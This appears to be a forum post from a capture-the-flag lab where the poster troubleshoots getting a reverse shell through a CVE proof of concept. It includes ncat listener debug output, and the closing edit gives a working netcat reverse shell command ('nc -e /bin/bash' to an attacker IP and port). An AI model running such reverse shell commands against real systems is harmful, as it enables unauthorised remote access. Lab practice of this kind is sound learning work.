To get initial foothold I’ve tried multiple different CVE’s -
The java one with the interface will execute a few commands like ls but even something as simple as cd it returns “Not executed for security reason”.
Of course first I tried a barebones /dev/tcp bash reverse shell, that wouldn’t work.
A netcat reverse shell DID connect, and I’ve tried searching to figure out what the issue is – the beginning of the connection looks like this but will not take a command:
Summary
Ncat: Version 7.93 ( Ncat - Netcat for the 21st Century )
NCAT DEBUG: Initialized fdlist with 103 maxfds
Ncat: Listening on :::8080
NCAT DEBUG: Added fd 3 to list, nfds 1, maxfd 3
Ncat: Listening on 0.0.0.0:8080
NCAT DEBUG: Added fd 4 to list, nfds 2, maxfd 4
NCAT DEBUG: Added fd 0 to list, nfds 3, maxfd 4
NCAT DEBUG: Initialized fdlist with 100 maxfds
NCAT DEBUG: selecting, fdmax 4
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 4 is ready
Ncat: Connection from 10.129.14.105.
NCAT DEBUG: Swapping fd[0] (3) with fd[2] (0)
NCAT DEBUG: Removed fd 3 from list, nfds 2, maxfd 4
NCAT DEBUG: Swapping fd[1] (4) with fd[1] (4)
NCAT DEBUG: Removed fd 4 from list, nfds 1, maxfd 0
Ncat: Connection from 10.129.14.105:58180.
NCAT DEBUG: Added fd 5 to list, nfds 2, maxfd 5
NCAT DEBUG: Added fd 5 to list, nfds 1, maxfd 5
NCAT DEBUG: selecting, fdmax 5
Looks like others have had the netcat issue and said it has something to do with the jdk version but it did the same thing for me with a python script…?
EDIT #2:
For anyone having similar issues, it was NOT the CVE POC that was at fault for not giving me the shell. So here I learned to use full paths for your shell executeable.
not really a spoiler, but gives the specific reverse shell code that worked for me:
nc 10.10.10.10 9001 -e bash and MANY other reverse shell options wouldn’t work.
nc -e /bin/bash 10.10.10.10 9001 however worked perfectly!